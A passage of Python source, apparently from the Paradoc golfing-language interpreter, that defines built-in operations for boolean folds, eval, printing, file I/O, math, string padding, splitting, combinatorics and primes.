[pd_organize(seq)]),\n Case.block_seq_range(lambda env, block, seq: [pd_organize_by(env, block, seq)]),\n ],\n docs=\"\"\"Group into lists of equal elements; like {{ 'Group'|b }},\n but the equal elements don't need to be consecutive. The lists come\n in the same order that their elements' first appearances did in the\n original list.\n\n ex: [3 1 2 2 1 1 1]Organize => [[3][1 1 1 1][2 2]]\"\"\",\n stability=\"alpha\",\n golf_aliases=['Ø'])\n cput('Organize_or_totient', ['Ø'], [\n Case.number(lambda env, a: [discrete.totient(a)]),\n Case.seq(lambda env, seq: [pd_organize(seq)]),\n Case.block_seq_range(lambda env, block, seq: [pd_organize_by(env, block, seq)]),\n ],\n docs=\"\"\"On numbers, Euler's {{ 'Totient'|b }} function (does not\n vectorize). On sequences or blocks with sequences, {{ 'Organize'|b }}.\"\"\",\n stability=\"alpha\")\n # }}}\n # Circumflexed vowels {{{\n even_case = Case.number(lambda env, n: [int(num.realify(n) % 2 == 0)])\n odd_case = Case.number(lambda env, n: [int(num.realify(n) % 2 == 1)])\n cput('Even', ['Ev'], [even_case], stability=\"alpha\")\n cput('Odd', ['Od'], [odd_case], stability=\"alpha\")\n def all_fold_f(es: Optional[List[PdObject]]) -> Optional[bool]:\n if es is None:\n return True\n else:\n for e in es:\n if not e: return False\n return None\n def any_fold_f(es: Optional[List[PdObject]]) -> Optional[bool]:\n if es is None:\n return False\n else:\n for e in es:\n if e: return True\n return None\n def make_all_and_exists_fold_f() -> Callable[[Optional[List[PdObject]]], Optional[bool]]:\n exists = False\n def f(es: Optional[List[PdObject]]) -> Optional[bool]:\n nonlocal exists\n if es is None:\n return exists\n else:\n for e in es:\n if not e: return False\n exists = True\n return None\n return f\n def make_unique_fold_f() -> Callable[[Optional[List[PdObject]]], Optional[bool]]:\n s: Set[PdObject] = set()\n def f(es: Optional[List[PdObject]]) -> Optional[bool]:\n if es is None:\n return True\n else:\n for e in es:\n if e in s: return False\n else: s.add(e)\n return None\n return f\n def make_identical_fold_f() -> Callable[[Optional[List[PdObject]]], Optional[bool]]:\n obj: Optional[PdObject] = None\n def f(es: Optional[List[PdObject]]) -> Optional[bool]:\n nonlocal obj\n if es is None:\n return True\n else:\n for e in es:\n if obj is None: obj = e\n elif obj != e: return False\n return None\n return f\n def all_and_exists(seq: Iterable[object]) -> bool:\n exists = False\n for e in seq:\n if not e: return False\n exists = True\n return exists\n all_cases = [\n Case.seq(lambda env, a: [int(all(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, all_fold_f))]),\n ]\n any_cases = [\n Case.seq(lambda env, a: [int(any(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, any_fold_f))]),\n ]\n all_and_exists_cases = [\n Case.seq(lambda env, a: [int(all_and_exists(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, make_all_and_exists_fold_f()))]),\n ]\n not_all_cases = [\n Case.seq(lambda env, a: [int(not all(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(not pd_map_fold_into(env, block, seq, all_fold_f))]),\n ]\n not_any_cases = [\n Case.seq(lambda env, a: [int(not any(pd_iterable(a)))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(not pd_map_fold_into(env, block, seq, any_fold_f))]),\n ]\n identical_cases = [\n Case.seq(lambda env, a: [int(pd_seq_is_identical(a))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, make_identical_fold_f()))]),\n ]\n unique_cases = [\n Case.seq(lambda env, a: [int(pd_seq_is_unique(a))]),\n Case.block_seq_range(lambda env, block, seq:\n [int(pd_map_fold_into(env, block, seq, make_unique_fold_f()))]),\n ]\n cput('All', ['Al'], all_cases, stability=\"beta\", golf_aliases=['Â'])\n cput('Any', ['An'], any_cases, stability=\"beta\", golf_aliases=['Ê'])\n cput('All_and_exists', ['Ae'], all_and_exists_cases, stability=\"alpha\")\n cput('Not_all', ['Na'], not_all_cases, stability=\"beta\")\n cput('Not_any', ['Not_exists', 'Ne'], not_any_cases, stability=\"beta\", golf_aliases=['Ô'])\n cput('Identical', ['=p'], identical_cases, stability=\"beta\", golf_aliases=['Î'])\n cput('Unique', [], unique_cases, stability=\"beta\", golf_aliases=['Û'])\n cput('Above_zero_or_all', ['Â'], [\n Case.number(lambda env, a: [int(num.realify(a) > 0)])\n ] + all_cases,\n docs=\"Above zero or All\", stability=\"beta\")\n cput('Even_or_any', ['Ê'], [even_case] + any_cases,\n docs=\"Even or Any (Exists)\", stability=\"beta\")\n cput('Equals_one_or_identical', ['Î'], [\n Case.number(lambda env, a: [int(num.numerify(a) == 1)]),\n ] + identical_cases,\n docs=\"Identity (equals 1) or Identical\", stability=\"beta\")\n cput('Odd_or_not_any', ['Ô'], [odd_case] + not_any_cases,\n docs=\"Odd or Not_any\", stability=\"beta\")\n cput('Under_zero_or_is_unique', ['Û'], [\n Case.number(lambda env, a: [int(num.realify(a) < 0)]),\n ] + unique_cases,\n docs=\"Under zero or Unique (test)\", stability=\"beta\")\n # }}}\n # Tilde and Eval {{{\n @put('Compl_or_eval_or_expand', '~',\n docs=\"\"\"Bitwise complement of integers. Expand lists or strings\n onto the stack, pushing each element separately in order. Eval on a\n block.\"\"\",\n stability=\"beta\")\n def tilde(env: Environment) -> None:\n a = env.pop()\n if isinstance(a, Block):\n a(env)\n elif isinstance(a, (str, list, range, Hoard)):\n env.push(*pd_iterable(a))\n elif isinstance(a, int):\n env.push(~a)\n else:\n raise NotImplementedError\n\n @put('Eval', 'Pd', docs=\"Evaluate a string as Paradoc code\", stability=\"alpha\")\n def pd_eval(env: Environment) -> None:\n a = env.pop()\n if isinstance(a, str):\n env.evaluate(a, set_quine=False) # (?)\n else:\n raise NotImplementedError\n\n @put('Quine_output', 'Qo', docs=\"Output the value of Qn, which will usually be the current program\", stability=\"alpha\")\n def quine_output(env: Environment) -> None:\n print(env.pd_str(env.get('Qn')), end=\"\")\n\n @put('Quine_print', 'Qp', docs=\"Print the value of Qn, which will usually be the current program\", stability=\"alpha\")\n def quine_print(env: Environment) -> None:\n env.print_output_record(env.pd_str(env.get('Qn')))\n # }}}\n # Input, output, and debugging {{{\n @put('Read_input', 'V',\n docs=\"\"\"Read something from standard input, as determined by the\n current input trigger.\"\"\",\n stability=\"alpha\")\n def read_input(env: Environment) -> None:\n e = env.run_input_trigger()\n if e is None:\n raise Exception('No more input!')\n else:\n env.push(e)\n\n @put('Output', 'O',\n docs=\"\"\"Output to standard output.\"\"\",\n stability=\"beta\")\n def pd_output(env: Environment) -> None:\n a = env.pop()\n print(env.pd_str(a), end=\"\")\n\n @put('Print', 'P',\n docs=\"\"\"Output to standard output, followed by an output record\n separator.\"\"\",\n stability=\"beta\")\n def pd_print(env: Environment) -> None:\n a = env.pop()\n env.print_output_record(env.pd_str(a))\n\n @put('Print_lines', 'Pl',\n docs=\"\"\"Output each element of a sequence to standard output, each\n followed by an output record separator. At the end, output an extra\n output record separator.\"\"\",\n stability=\"unstable\")\n def pd_print_lines(env: Environment) -> None:\n a = env.pop()\n if not isinstance(a, (str, list, range)):\n raise TypeError('Cannot Print_lines non-sequence')\n for e in pd_iterable(a):\n env.print_output_record(env.pd_str(e))\n env.print_output_record()\n\n @put('Printkeep', 'Ƥ', '\\x10',\n docs=\"\"\"Pop something, output to standard output followed by an\n output record separator, then push it back. Pretty much just {{\n 'Print'|b }}_{{ 'keep'|bt }}.\"\"\",\n stability=\"unstable\")\n def pd_printkeep(env: Environment) -> None:\n a = env.pop()\n env.print_output_record(env.pd_str(a))\n env.push(a)\n\n @put('Space_output', ' o',\n docs=\"Output a space.\", stability=\"beta\")\n def pd_space_output(env: Environment) -> None:\n print(' ', end=\"\")\n @put('Newline_output', '\\no', '\\\\no',\n docs=\"Output a newline.\", stability=\"beta\")\n def pd_newline_output(env: Environment) -> None:\n print()\n @put('Newline_print', '\\np', '\\\\np',\n docs=\"Output a newline, followed by an output record separator.\",\n stability=\"beta\")\n def pd_newline_print(env: Environment) -> None:\n env.print_output_record(\"\\n\")\n\n @put('Dump', 'Pdebug',\n docs=\"\"\"Print debugging information about the environment and\n stack.\"\"\",\n stability=\"alpha\")\n def dump(env: Environment) -> None:\n if env.get('Debug'):\n print('Dump:', env.debug_dump(), file=sys.stderr)\n\n if sandboxed:\n pass # TODO\n else:\n @put('Read_file', 'Vf',\n docs=\"\"\"Read contents of a file with the given name.\"\"\",\n stability=\"alpha\")\n def read_file(env: Environment) -> None:\n filename = env.pop()\n if isinstance(filename, str):\n with open(filename) as infile:\n env.push(infile.read())\n else:\n raise Exception(\"Cannot read non-string filename!\")\n @put('Output_file', 'Of',\n docs=\"\"\"Write contents to a file with the given name (overwriting the file).\"\"\",\n stability=\"alpha\")\n def output_file(env: Environment) -> None:\n a = env.pop()\n filename = env.pop()\n if isinstance(filename, str):\n with open(filename, 'w') as outfile:\n outfile.write(env.pd_str(a))\n else:\n raise Exception(\"Cannot write non-string filename!\")\n @put('Append_file', 'Af',\n docs=\"\"\"Append contents to a file with the given name.\"\"\",\n stability=\"alpha\")\n def append_file(env: Environment) -> None:\n a = env.pop()\n filename = env.pop()\n if isinstance(filename, str):\n with open(filename, 'a') as outfile:\n outfile.write(env.pd_str(a))\n else:\n raise Exception(\"Cannot append non-string filename!\")\n # }}}\n # Break, Continue, Exit {{{\n @put('Exit', 'E',\n docs=\"\"\"Exit the current program.\"\"\",\n stability=\"beta\")\n def exit(env: Environment) -> None:\n raise PdExitException(\"Exit\")\n\n @put('Exit_with_code', 'Ec',\n docs=\"\"\"Exit the current program with the specified exit code or\n message.\"\"\",\n stability=\"beta\")\n def exit_with_code(env: Environment) -> None:\n e = env.pop()\n if isinstance(e, (int, float, Char)):\n raise PdExitException(\"Exit\", num.intify(e))\n else:\n print(\"Exit: \" + str(e), file=sys.stderr)\n raise PdExitException(str(e), 1)\n\n @put('Break', 'Quit_loop', 'Q',\n docs=\"\"\"Break out of the current loop.\"\"\",\n stability=\"beta\")\n def break_(env: Environment) -> None:\n raise PdBreakException('Break')\n @put('Continue', 'Keep_going', 'K',\n docs=\"\"\"Skip to the next iteration of the current loop.\"\"\",\n stability=\"beta\")\n def continue_(env: Environment) -> None:\n raise PdContinueException('Continue')\n # }}}\n # Constant powers and fractions {{{\n def pd_constant_fraction_cases(p: int, q: int) -> List[Case]:\n # Cannot sensibly handle improper fractions p/q > 1 if q > 1.\n return [\n Case.number(lambda env, a: [num.pd_mul_div_const(a, p, q)]),\n Case.seq(lambda env, a: [pd_slice(a, None, len(a)*p//q) if p <= q else pd_mul_seq(a, p)]),\n Case.block(lambda env, b:\n pd_run_with_probability_then_empty_list(env, b, p/q)\n if p <= q else\n pd_foreach_x_only_then_empty_list(env, b, range(p))\n ),\n ]\n cput('Halve', ['½'], pd_constant_fraction_cases(1, 2), stability=\"alpha\")\n cput('Quarter', ['¼'], pd_constant_fraction_cases(1, 4), stability=\"alpha\")\n cput('Three_quarters', ['¾'], pd_constant_fraction_cases(3, 4), stability=\"alpha\")\n cput('Double', ['×'], pd_constant_fraction_cases(2, 1), stability=\"beta\")\n\n cput('Halve_int', ['Hi'], [\n Case.number(lambda env, a: [num.pd_mul_div_const(a, 1, 2, to_int=True)]),\n ], stability=\"unstable\")\n\n cput('Square', ['²'], [\n Case.number(lambda env, n: [num.pd_power_const(n, 2)]),\n Case.seq(lambda env, s: [pd_cartesian_product_seq_matrix(s, s)]),\n Case.block_seq_range(lambda env, block, seq: [pd_map_cartesian_product(env, block, seq, seq, flat=False)]),\n ],\n docs=\"\"\"Square a number, or compute the Cartesian product of a\n sequence with itself, or map a block across that.\"\"\",\n stability=\"beta\")\n cput('Cube', ['³'], [\n Case.number(lambda env, n: [num.pd_power_const(n, 3)]),\n Case.seq(lambda env, s: [pd_cartesian_product_seq_matrix_3(s, s, s)]),\n ],\n docs=\"\"\"Cube a number, or compute the Cartesian product of three\n copies of a sequence.\"\"\",\n stability=\"beta\")\n # }}}\n # Len, abs, loop {{{\n abs_case = Case.number(lambda env, n: [num.pd_abs(n)])\n len_case = Case.seq(lambda env, seq: [len(seq)])\n loop_case = Case.block(lambda env, block: [pd_forever_then_empty_list(env, block)])\n cput('Len', [], [len_case],\n docs=\"\"\"Length of a sequence.\"\"\",\n stability=\"stable\",\n golf_aliases=['L'])\n cput('Abs', [], [abs_case],\n docs=\"\"\"Absolute value of a number.\"\"\",\n stability=\"stable\",\n golf_aliases=['L'])\n cput('Loop', [], [loop_case],\n docs=\"\"\"Loop forever (until {{ 'Break'|b }} or other error.)\"\"\",\n stability=\"alpha\",\n golf_aliases=['L'])\n cput('Abs_or_len_or_loop', ['L'], [abs_case, len_case, loop_case],\n docs=\"\"\"{{ 'Abs'|b }} on numbers; {{ 'Len'|b }} on sequences; {{\n 'Loop'|b }} on blocks.\"\"\",\n stability=\"alpha\")\n # }}}\n # Other numeric predicates {{{\n cput('Positive', ['+p'], [Case.value_n2v(lambda e: int(e.real > 0))], stability=\"beta\")\n cput('Negative', ['-p'], [Case.value_n2v(lambda e: int(e.real < 0))], stability=\"beta\")\n cput('Positive_or_zero', ['+o'], [Case.value_n2v(lambda e: int(e.real >= 0))], stability=\"alpha\")\n cput('Negative_or_zero', ['-o'], [Case.value_n2v(lambda e: int(e.real <= 0))], stability=\"alpha\")\n # }}}\n # Dumping Python's math {{{\n cput('Sin', ['Sn'], [Case.value_rc2v(math.sin , cmath.sin )], stability=\"beta\")\n cput('Cos', ['Cs'], [Case.value_rc2v(math.cos , cmath.cos )], stability=\"beta\")\n cput('Tan', ['Tn'], [Case.value_rc2v(math.tan , cmath.tan )], stability=\"beta\")\n cput('Asin', ['As'], [Case.value_rc2v(math.asin, cmath.asin)], stability=\"beta\")\n cput('Acos', ['Ac'], [Case.value_rc2v(math.acos, cmath.acos)], stability=\"beta\")\n cput('Atan', ['At'], [Case.value_rc2v(math.atan, cmath.atan)], stability=\"beta\")\n cput('Sec', ['Sc'], [Case.value_rc2v(lambda t: 1/math.cos(t), lambda t: 1/cmath.cos(t))], stability=\"alpha\")\n cput('Csc', ['Cc'], [Case.value_rc2v(lambda t: 1/math.sin(t), lambda t: 1/cmath.sin(t))], stability=\"alpha\")\n cput('Cot', ['Ct'], [Case.value_rc2v(lambda t: 1/math.tan(t), lambda t: 1/cmath.tan(t))], stability=\"alpha\")\n cput('Exp', ['Ef'], [Case.value_rc2v(math.exp , cmath.exp )], stability=\"beta\", docs=\"Exponential Function\")\n cput('Log_e', ['Ln'], [Case.value_rc2v(math.log , cmath.log )], stability=\"beta\")\n cput('Log_ten', ['Lt'], [Case.value_rc2v(math.log10, cmath.log10)], stability=\"alpha\")\n cput('Log_two', ['Lg'], [Case.value_rc2v(math.log2 , lambda t: cmath.log(t) / cmath.log(2))], stability=\"alpha\")\n # }}}\n # Character conversion and predicates (letter-case etc) {{{\n cput('Lowercase', ['Lc'], [Case.value(lambda env, x: [pd_deepmap_s2s(lambda e: e.lower(), x)])], docs=\"Converts all characters to lowercase. Deeply vectorizes.\", stability=\"beta\")\n cput('Uppercase', ['Uc'], [Case.value(lambda env, x: [pd_deepmap_s2s(lambda e: e.upper(), x)])], docs=\"Converts all characters to uppercase. Deeply vectorizes.\", stability=\"beta\")\n cput('Exchange_case', ['Xc'], [Case.value(lambda env, x: [pd_deepmap_s2s(lambda e: e.swapcase(), x)])], docs=\"Swaps the case of all characters. Deeply vectorizes.\", stability=\"alpha\")\n # TODO: this doesn't work on, say, lists of chars\n cput('Title_case', ['Tc'], [Case.value(lambda env, x: [pd_deepmap_s2s(lambda e: e.title(), x)])], docs=\"Title-cases all strings?\", stability=\"alpha\")\n cput('Matching_character', ['Mc'], [\n Case.value(lambda env, x: [pd_deepmap_s2s(\n lambda e: num.matching_dict.get(e, e), x, whole_str_ok=False)])\n ],\n docs=\"\"\"Finds the matching character for one of the characters\n ()[]{}<>, or returns the character itself. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n\n cput('Is_alpha', ['Ap'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.isalpha()), x)])], docs=\"Tests if characters are letters. Deeply vectorizes.\", stability=\"beta\")\n cput('Is_digit', ['Dp'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.isdigit()), x)])], docs=\"Tests if characters are digits. Deeply vectorizes.\", stability=\"alpha\")\n cput('Is_lower', ['Lp'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.islower()), x)])], docs=\"Tests if characters are lowercase. Deeply vectorizes.\", stability=\"beta\")\n cput('Is_upper', ['Up'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.isupper()), x)])], docs=\"Tests if characters are uppercase. Deeply vectorizes.\", stability=\"beta\")\n cput('Is_space', ['Wp'], [Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: int(e.isspace()), x)])], docs=\"Tests if characters are whitespace. Deeply vectorizes.\", stability=\"alpha\")\n cput('Value_of_character', ['Vc'], [\n Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: num.value_dict.get(e, 0), x)])\n ],\n docs=\"\"\"Finds the \"value\" of a character: digits give their numeric\n value, - and < give -1, + and > give +1, everything else gives 0.\n Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Nest_of_character', ['Nc'], [\n Case.value(lambda env, x: [pd_deepmap_s2v(lambda e: num.nest_dict.get(e, 0), x)])\n ],\n docs=\"\"\"Finds the amount by which a character affects \"nestedness\":\n ([{< give +1, >}]) give -1, everything else gives 0. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Int_of_alpha', ['Ia'], [Case.value(lambda env, x: [pd_deepmap_s2v(num.int_of_alpha, x)])],\n docs=\"\"\"Convert a letter to an integer starting with A = 1;\n non-letters (or letters outside the Latin alphabet) give 0. Deeply\n vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Lower_of_int', ['Li'], [Case.value(lambda env, x: [pd_deepmap_n2v(lambda e: num.lower_of_int(num.intify(e)), x)])],\n docs=\"\"\"Convert an integer to a lowercase letter starting with a =\n 1; things outside the range 1 to 26 give spaces. Deeply\n vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Upper_of_int', ['Ui'], [Case.value(lambda env, x: [pd_deepmap_n2v(lambda e: num.upper_of_int(num.intify(e)), x)])],\n docs=\"\"\"Convert an integer to an uppercase letter starting with A =\n 1; things outside the range 1 to 26 give spaces. Deeply\n vectorizes.\"\"\",\n stability=\"unstable\")\n # }}}\n # Replicate, fill/pad {{{\n\n cput('Replicate', ['°', 'Rp'], [\n Case.any_number(lambda env, x, n: [pd_replicate(x, num.intify(n))]),\n ],\n docs=\"\"\"Make a list by repeating an element some number of\n times.\"\"\",\n stability=\"beta\")\n\n cput('Signed_replicate', ['Sr'], [\n Case.any_any_number(lambda env, x, y, n: [\n pd_replicate(y, num.intify(n))\n if num.intify(n) >= 0 else\n pd_replicate(x, -num.intify(n))\n ]),\n ],\n docs=\"\"\"Make a list by repeating one of two elements some number of\n times, the first one if negative and the second one if\n positive.\"\"\",\n stability=\"unstable\")\n\n # Left-padding is right-justifying and vice versa...\n\n def char_biased_pad_cases(\n f: Callable[[str, int], str]) -> List[Case]:\n return [\n Case.char_number(lambda env, c, n: [f(env.pd_str(c), num.intify(n))]),\n Case.value_number(lambda env, c, n: [f(env.pd_str(c), num.intify(n))]),\n ]\n\n cput('Zero_fill', ['Zf'],\n char_biased_pad_cases(lambda s, n: s.rjust(n, '0')),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and left-pad it with zeroes until at least the\n length.\"\"\",\n stability=\"unstable\")\n cput('Left_fill_with_spaces', ['f'],\n char_biased_pad_cases(lambda s, n: s.ljust(n)),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and right-pad it with spaces until at least the\n length.\"\"\",\n stability=\"unstable\")\n cput('Center_fill_with_spaces', ['=f'],\n char_biased_pad_cases(lambda s, n: s.center(n)),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and pad it with equally many spaces on either side\n until at least the length.\"\"\",\n stability=\"unstable\")\n cput('Left_add_spaces', ['‹p'],\n char_biased_pad_cases(lambda s, n: ' ' * n + s),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and prepend that many spaces. Mnemonic: well, left-pad\n (but \"fill\" doesn't make sense unless you're filling up to\n something, whereas padding still makes sense.)\"\"\",\n stability=\"unstable\")\n cput('Right_add_spaces', ['›p'],\n char_biased_pad_cases(lambda s, n: s + ' ' * n),\n docs=\"\"\"Given a value and a length, convert the value to a string\n if necessary and append that many spaces. Mnemonic: well, right-pad\n (but \"fill\" doesn't make sense unless you're filling up to\n something, whereas padding still makes sense.)\"\"\",\n stability=\"unstable\")\n\n cput('Left_fill', ['[f'], [\n Case.list_range_number_any(lambda env, s, n, fill:\n [pd_build_like(s, [fill] * (num.intify(n) - len(s)) + list(pd_iterable(s)))]),\n ],\n docs=\"\"\"Given a list (numbers coerce to ranges), a length, and a\n filler object, left-pad the list with the filler object until at\n least the length.\"\"\",\n stability=\"unstable\")\n cput('Right_fill', [']f'], [\n Case.list_range_number_any(lambda env, s, n, fill:\n [pd_build_like(s, list(pd_iterable(s)) + [fill] * (num.intify(n) - len(s)))]),\n ],\n docs=\"\"\"Given a list (numbers coerce to ranges), a length, and a\n filler object, right-pad the list with the filler object until at\n least the length.\"\"\",\n stability=\"unstable\")\n cput('Left_add', ['«p'], [\n Case.list_range_number_any(lambda env, s, n, fill:\n [pd_build_like(s, [fill] * (num.intify(n)) + list(pd_iterable(s)))]),\n ],\n docs=\"\"\"Given a list (numbers coerce to ranges), a number, and a\n filler object, left-pad the list with number copies of the filler\n object.\"\"\",\n stability=\"unstable\")\n cput('Right_add', ['»p'], [\n Case.list_range_number_any(lambda env, s, n, fill:\n [pd_build_like(s, list(pd_iterable(s)) + [fill] * (num.intify(n)))]),\n ],\n docs=\"\"\"Given a list (numbers coerce to ranges), a number, and a\n filler object, right-pad the list with number copies of the filler\n object.\"\"\",\n stability=\"unstable\")\n\n cput('Space_repeat', [' x'], [\n Case.int_len(lambda env, n: [' ' * n]),\n ],\n stability=\"alpha\")\n\n cput('Newline_repeat', ['\\nx', '\\\\nx'], [\n Case.int_len(lambda env, n: ['\\n' * n]),\n ],\n stability=\"alpha\")\n # }}}\n # Key_* functions, for big arrays {{{\n cput('Key_new', ['Kn'], [\n Case.list_list_singleton_value(lambda env, kvs, dims, filler: [pd_new_array(kvs, dims, filler)]),\n ],\n docs=\"\"\"Make an array given a starting list of key-value pairs,\n dimensions, and filler.\"\"\",\n stability=\"alpha\")\n cput('Key_map', ['Km'], [\n Case.list_list_block(lambda env, arr, ks, func: [pd_array_keys_map(env, arr, ks, func)]),\n ],\n docs=\"\"\"Map over keys of an array.\"\"\",\n stability=\"alpha\")\n cput('Key_get', ['Kg'], [\n Case.seq_seq_singleton(lambda env, arr, k: [pd_array_key_get(arr, k)]),\n ],\n docs=\"\"\"Access value corresponding to a key in an array.\"\"\",\n stability=\"alpha\")\n # }}}\n # W for Window and W for Words, plus splitting {{{\n words_case = Case.seq(lambda env, seq: [pd_split_seq_by_spaces(seq)])\n window_case = Case.number_seq(lambda env, n, seq: [pd_sliding_window_seq(seq, n)])\n while_case = Case.block2(lambda env, cond, body:\n pd_while_then_empty_list(env, cond, body))\n cput('Words', [], [words_case], stability=\"alpha\", golf_aliases=['W'])\n cput('Window', [], [window_case], stability=\"alpha\", golf_aliases=['W'])\n\n space_split_case = Case.seq(lambda env, seq: [pd_split_seq_by(seq, ' ')])\n cput('Space_split', ['Space_break', ' b', ' s'], [space_split_case],\n docs=\"\"\"Split by a single space. Note that this returns empty\n strings between adjacent spaces, as well as at the start or end if\n the string starts or ends with spaces, and it does not split by\n other whitespace. Use {{ 'Words'|b }} if you don't want that.\n\n I think I had a reason at one point, but I don't remember why I\n passed up \"s for split\" for \"b for break\" as the mnemonic, and\n re-examining this idea now there are quite a few reasons for s.\"\"\",\n stability=\"alpha\")\n\n lines_case = Case.seq(lambda env, seq: [pd_split_seq_by(seq, '\\n')])\n cput('Line_split', ['Lines', 'Line_break', '\\nb', '\\\\nb', '\\ns', '\\\\ns'], [lines_case],\n docs=\"\"\"Split by a single newline.\"\"\",\n stability=\"alpha\")\n\n comma_split_case = Case.seq(lambda env, seq: [pd_split_seq_by(seq, ',')])\n cput('Comma_split', [',s'], [comma_split_case],\n docs=\"\"\"Split by a single comma.\"\"\",\n stability=\"alpha\")\n\n def map_on_case(delim: str) -> Case:\n return Case.block_value(lambda env, block, value:\n [delim.join(env.pd_str(w) for w in pd_map_iterable(env, block, env.pd_str(value).split(delim)))])\n cput('Map_on_words', [' m'], [map_on_case(' ')],\n docs=\"\"\"Map on words: takes a block and a string, split the string\n by spaces, map the block over the tokens, then join the tokens with\n a space.\"\"\",\n stability=\"alpha\")\n cput('Map_on_lines', ['\\nm', '\\\\nm'], [map_on_case('\\n')],\n docs=\"\"\"Map on lines: takes a block and a string, split the string\n into lines, map the block over the tokens, then join the tokens\n with a linebreak.\"\"\",\n stability=\"alpha\")\n\n cput('While', [], [while_case],\n docs=\"\"\"While loop: Execute first block, pop, break if false, execute\n second block, repeat.\"\"\",\n stability=\"alpha\", golf_aliases=['W'])\n cput('Window_or_words_or_while', ['W'], [words_case, window_case, while_case],\n docs=\"\"\"Words (split by spaces) or Window (sliding window of size\n given by number) or While loop.\"\"\",\n stability=\"alpha\")\n # }}}\n # Combinatorics {{{\n factorial_case = Case.number(\n lambda env, n: [discrete.factorial(num.realify(n))]\n )\n permutation_cases = [\n Case.seq(lambda env, seq:\n [list(list(p) for p in itertools.permutations(pd_iterable(seq)))]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_map_iterable(env, block,\n map(list, itertools.permutations(pd_iterable(seq))))]),\n ]\n cput('Permutations', [], permutation_cases, stability=\"beta\", golf_aliases=['¡'])\n cput('Factorial', [], [factorial_case], stability=\"beta\", golf_aliases=['¡'])\n cput('Permutations_or_factorial', ['¡', '!p'],\n [factorial_case] + permutation_cases,\n stability=\"beta\")\n binomial_coefficient_case = (\n Case.number2(lambda env, n, k: [discrete.binomial_coefficient(\n num.realify(n), num.realify(k))])\n )\n cput('Binomial_coefficient', ['Bc'], [binomial_coefficient_case],\n stability=\"beta\", golf_aliases=['Ç'])\n cput('Ç', [], [binomial_coefficient_case],\n docs=\"Unstable alias for {{ 'Binomial_coefficient'|b }}.\",\n stability=\"unstable\")\n # TODO: choose\n cput('Subsequences', ['¿', 'Ss'], [\n Case.number(lambda env, n: [2 ** num.numerify(n)]),\n Case.seq(lambda env, seq: [pd_subsequences_list(seq)]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_map_iterable(env, block,\n pd_subsequences(seq))]),\n ],\n stability=\"beta\")\n cput('Fibonacci', ['Fb'], [Case.number(\n lambda env, n: [discrete.fibonacci(num.realify(n))]\n )],\n stability=\"beta\")\n # }}}\n # adjacencies {{{\n cput('Orthogonal_neighbors', ['+n'], [\n Case.value(lambda env, x: [pd_orthogonal_neighbors(x)]),\n ],\n docs=\"\"\"Return a list of almost-copies of the object, two per deep\n element, one with that deep element decreased by 1 and one with it\n increased by 1.\"\"\",\n stability=\"unstable\")\n\n cput('King_neighbors', ['*n'], [\n Case.value(lambda env, x: [pd_king_neighbors(x)]),\n ],\n docs=\"\"\"Return a list of almost-copies of the object, every variant\n obtainable by modifying each deep element by -1, 0, or 1, except\n for the original object itself.\"\"\",\n stability=\"unstable\")\n # }}}\n # Number theory (primes etc) {{{\n cput('Is_prime', ['Pp', '¶'], [\n Case.value_r2v(discrete.is_prime_as_int),\n ],\n docs=\"\"\"Test if this is prime.\"\"\",\n stability=\"alpha\")\n cput('Prev_prime', ['(p'], [\n Case.value_r2v(discrete.prev_prime),\n ],\n docs=\"\"\"Find the largest prime smaller than this.\"\"\",\n stability=\"alpha\")\n cput('Next_prime', [')p'], [\n Case.value_r2v(discrete.next_prime),\n ],\n docs=\"\"\"Find the smallest prime larger than this.\"\"\",\n stability=\"alpha\")\n cput('Factorize', ['Fc'], [\n Case.value_r2v(discrete.prime_factorization_wrapped),\n ],\n docs=\"\"\"Factorize as a list of pairs of primes and exponents\"\"\",\n stability=\"alpha\")\n cput('Factorize_flat', ['Ff'], [\n Case.value_r2v(discrete.prime_factorization_flat),\n ],\n docs=\"\"\"Factorize as a flat list of possibly repeating prime\n factors\"\"\",\n stability=\"alpha\")\n cput('Totient', ['Et'], [\n Case.value_r2v(discrete.totient),\n ],\n docs=\"Euler's Totient function. If you don't need vectorizing, {{ 'Ø'|b }} works too.\", stability=\"alpha\")\n cput('Jacobi_symbol', ['Js'], [\n Case.number2(lambda env, m, n: [discrete.jacobi_symbol(num.realify(m), num.realify(n))]),\n ],\n docs=\"\"\"Jacobi symbol of two numbers\"\"\",\n stability=\"unstable\")\n # }}}\n # Time {{{\n cput('Now_time', ['Nt'], [Case.void(lambda env: [time.time()])], stability=\"alpha\")\n now = datetime.datetime.now\n fts = datetime.datetime.fromtimestamp\n\n cput('Now_minute', ['Nb'], [Case.void (lambda _: [ now().minute ])], docs=\"Get the current minute\", stability=\"alpha\")\n cput('Epoch_minute', ['Eb'], [Case.value_r2v(lambda e: fts(e).minute )], docs=\"Get the minute from a timestamp\", stability=\"alpha\")\n cput('Now_day', ['Nd'], [Case.void (lambda _: [ now().day ])], docs=\"Get the current day\", stability=\"alpha\")\n cput('Epoch_day', ['Ed'], [Case.value_r2v(lambda e: fts(e).day )], docs=\"Get the day from a timestamp\", stability=\"alpha\")\n cput('Now_hour', ['Nh'], [Case.void (lambda _: [ now().hour ])], 